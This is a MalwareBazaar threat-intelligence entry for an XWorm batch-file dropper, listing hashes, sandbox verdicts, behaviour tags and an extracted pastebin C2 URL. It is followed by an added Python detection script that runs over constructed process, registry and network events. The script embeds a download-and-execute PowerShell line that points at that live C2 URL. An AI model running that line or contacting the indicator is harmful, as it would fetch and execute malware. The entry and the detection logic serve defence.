MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b0c25fadfb9727a68e1e7aae95c58a28a32e87ac9ad6252356ca6e7940c2112d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

XWorm
Vendor detections: 13

SHA256 hash: b0c25fadfb9727a68e1e7aae95c58a28a32e87ac9ad6252356ca6e7940c2112d
SHA3-384 hash: cc1681b92217107df96ce440f59ef5873ea3b94eecb69e486ff198106fc836828359dd80cb7ba2018a94b6e50bec0b7f
SHA1 hash: a175c6ca4d3ff8ccc72ccca1889c6e3917ced7ca
MD5 hash: 37b99fc7edecf05abc6f84f3b5cbd17d
humanhash: july-queen-vermont-double
File name: ghost_crypter.bat
Signature: XWorm
File size: 307 bytes
First seen: 2025-12-25 21:23:44 UTC
Last seen: Never
File type: Batch (bat)
MIME type: text/x-msdos-batch
ssdeep: 6:hHNGDXvay2olNHn+YWjvT9Ds81R3KupMFXA98WFW0LW62EIJR3Kb6:myyrXn+YWjvT9Y81kUMhA98WFWyW6mk+
Threatray: 1'223 similar samples on MalwareBazaar
TLSH: T194E0EB849C28705FEEDFC598872203066C4722C2960F83411B2CF8313A02EEEC7DE8A3
Magika: batch
Reporter: BastianHein
Tags: bat xworm

Intelligence

File Origin
Number of uploads: 1
Number of downloads: 67
Origin country: CL

Vendor Threat Intelligence

No detections

Malware family: n/a
ID: 1
File name: ghost_crypter.bat
Verdict: Malicious activity
Analysis date: 2025-12-25 21:24:21 UTC
Tags: xworm pastebin auto-startup auto-reg remote
Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample

Verdict: Malicious
Score: 92.5%
Tags: asyncrat shell agent sage

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: base64 dropper evasive lolbin mshta powershell svchost.exe

Verdict: Malicious
File Type: unix shell
First seen: 2025-12-25T17:21:00Z UTC
Last seen: 2025-12-27T17:31:00Z UTC
Hits: ~10
Detections: HEUR:Trojan.BAT.Agent.gen Trojan.Win32.Runner.b Trojan.Win32.Agent.sb

Threat name: Win32.Trojan.Generic
Status: Suspicious

First seen: 2025-12-25 21:24:17 UTC
File Type: Text (Batch)
AV detection: 2 of 24 (8.33%)
Threat level: 5/5

Result
Malware family:
Score: 10/10
Tags: family:xworm execution persistence rat trojan
Behaviour:
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks computer location settings
Drops startup file
Executes dropped EXE
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Detect Xworm Payload
Xworm
Xworm family
Malware Config
C2 Extraction: https://pastebin.com/raw/BnfuTUHU:7193
Please note that we are no longer able to provide a coverage score for Virus Total.
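The behaviour and tag entries above (mshta, encoded PowerShell, base64, a Run key, a pastebin raw URL as the extracted C2, a dropped EXE tagged svchost.exe) are sandbox observations of the whole chain, not the contents of the 307-byte batch file itself, which is far too small to carry the RAT and serves only as the first stage. What follows is an added example, not code from MalwareBazaar or any of the vendors listed, of detection logic for that chain run over constructed Sysmon-style events. The process tree, file paths, the WinUpdate value name and the 203.0.113.10 address are hypothetical placeholders; the only indicators taken from this entry are the pastebin raw URL and the port 7193 from the C2 Extraction field.

```python
import base64
import re

# Constructed events for illustration only; none of this is telemetry from the
# sample. The process tree is a hypothetical one consistent with the tags on
# this entry: cmd.exe runs the .bat, which launches mshta.exe, which starts an
# encoded PowerShell command that sets a Run key, contacts the pastebin raw URL
# listed under C2 Extraction, and runs a dropped EXE named svchost.exe.
PLAIN_PS = ("$u='https://pastebin.com/raw/BnfuTUHU';"
            "IEX (New-Object Net.WebClient).DownloadString($u)")
# -EncodedCommand takes base64 of the UTF-16LE script, not of UTF-8 text.
ENC_PS = base64.b64encode(PLAIN_PS.encode("utf-16-le")).decode()

EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe", "parent": "explorer.exe",
     "cmdline": r"cmd.exe /c C:\Users\user\Downloads\ghost_crypter.bat"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "parent": "cmd.exe",
     "cmdline": r"mshta.exe C:\Users\Public\stage.hta"},  # hypothetical path
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "mshta.exe", "cmdline": "powershell.exe -nop -w hidden -enc " + ENC_PS},
    {"type": "registry", "image": "powershell.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate",  # hypothetical name
     "data": r"C:\Users\user\AppData\Roaming\svchost.exe"},
    {"type": "network", "image": "powershell.exe", "dst_host": "pastebin.com", "dst_port": 443},
    {"type": "process", "image": r"C:\Users\user\AppData\Roaming\svchost.exe",
     "parent": "powershell.exe", "cmdline": "svchost.exe"},
    {"type": "network", "image": r"C:\Users\user\AppData\Roaming\svchost.exe",
     "dst_host": "203.0.113.10", "dst_port": 7193},  # TEST-NET address, placeholder
]

SCRIPT_HOSTS = {"cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# -e, -ec, -enc and -EncodedCommand are all accepted abbreviations.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
RUN_KEY_RE = re.compile(r"(?i)\\CurrentVersion\\Run(?:Once)?\\")
PASTE_HOSTS = {"pastebin.com"}
C2_PORT = 7193  # port from the C2 Extraction field of this entry


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(b64):
    """Decode a PowerShell -EncodedCommand argument (base64 over UTF-16LE)."""
    return base64.b64decode(b64).decode("utf-16-le")


def is_real_svchost(image):
    # svchost.exe is legitimate only under System32/SysWOW64; anything else
    # with that name is a lookalike.
    return image.lower().startswith((r"c:\windows\system32\svchost.exe",
                                     r"c:\windows\syswow64\svchost.exe"))


def detect(events):
    """Return (rule_name, detail) tuples for every event that matches a rule."""
    alerts = []
    for ev in events:
        img = basename(ev["image"])
        if ev["type"] == "process":
            m = ENC_RE.search(ev["cmdline"])
            if img == "powershell.exe" and m and ev["parent"].lower() in SCRIPT_HOSTS:
                alerts.append(("encoded_powershell_from_script_host",
                               decode_encoded_command(m.group(1))))
            if img == "svchost.exe" and not is_real_svchost(ev["image"]):
                alerts.append(("svchost_lookalike_outside_system32", ev["image"]))
        elif ev["type"] == "registry":
            if RUN_KEY_RE.search(ev["key"]) and img in SCRIPT_HOSTS:
                alerts.append(("run_key_persistence_by_script_host", ev["key"]))
        elif ev["type"] == "network":
            if ev["dst_host"].lower() in PASTE_HOSTS and img in SCRIPT_HOSTS:
                alerts.append(("paste_site_contact_by_script_host", ev["dst_host"]))
            if ev["dst_port"] == C2_PORT:
                alerts.append(("connect_to_extracted_c2_port",
                               f'{ev["dst_host"]}:{ev["dst_port"]}'))
    return alerts


if __name__ == "__main__":
    for name, detail in detect(EVENTS):
        print(name, detail)
```

Two points the entry itself does not spell out: the encoded command must be decoded as UTF-16LE before any string match on its contents will fire, and the URL:port form of the extracted C2 means the paste body, not the URL, supplies the host, so the operator can retarget the C2 by editing the paste without touching the sample; the paste URL is still worth blocking, but the port and the dead-drop pattern are the more durable indicators.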

File information


The table below shows additional information about this malware sample such as delivery method and external references.